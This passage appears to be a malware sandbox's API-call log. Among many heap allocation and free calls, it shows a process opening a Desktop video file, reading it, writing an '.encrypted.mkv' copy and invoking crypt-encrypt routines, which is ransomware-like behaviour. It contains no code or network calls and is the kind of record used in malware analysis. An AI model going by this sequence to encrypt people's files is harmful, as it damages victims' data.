returned 1 [0029.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.958] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0029.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0029.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0029.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0029.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0029.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0029.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0029.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac2f0 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c75d0 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0029.959] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.960] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.960] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0029.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0029.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0029.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0029.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0029.961] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0029.961] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0029.961] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0029.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0029.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0029.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0029.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0029.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0029.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0029.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0029.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2140 [0029.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0029.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0029.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0029.961] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hnsu4w.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.961] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.961] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0029.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0029.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0029.961] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0029.961] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0029.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0029.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0029.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.962] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0029.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0029.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0029.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0029.962] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0029.962] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0029.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0029.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0029.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0029.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0029.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0029.962] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0029.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0029.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0029.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0029.962] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0029.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0029.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0029.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0029.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0029.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0029.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0029.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0029.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0029.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0029.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0029.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0029.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0029.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0029.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.963] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.encrypted.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hnsu4w.encrypted.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0029.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0029.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0029.964] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0029.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0029.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0029.964] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.964] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0029.964] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0029.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0029.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0029.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.964] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0029.964] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0xf8a1, lpOverlapped=0x0) returned 1 [0029.966] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0029.967] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0029.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0029.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf8a1) returned 0x8affc0 [0029.967] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.968] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0029.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.968] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0029.968] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0029.968] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0029.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0029.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0029.968] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0029.969] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0029.969] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0029.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 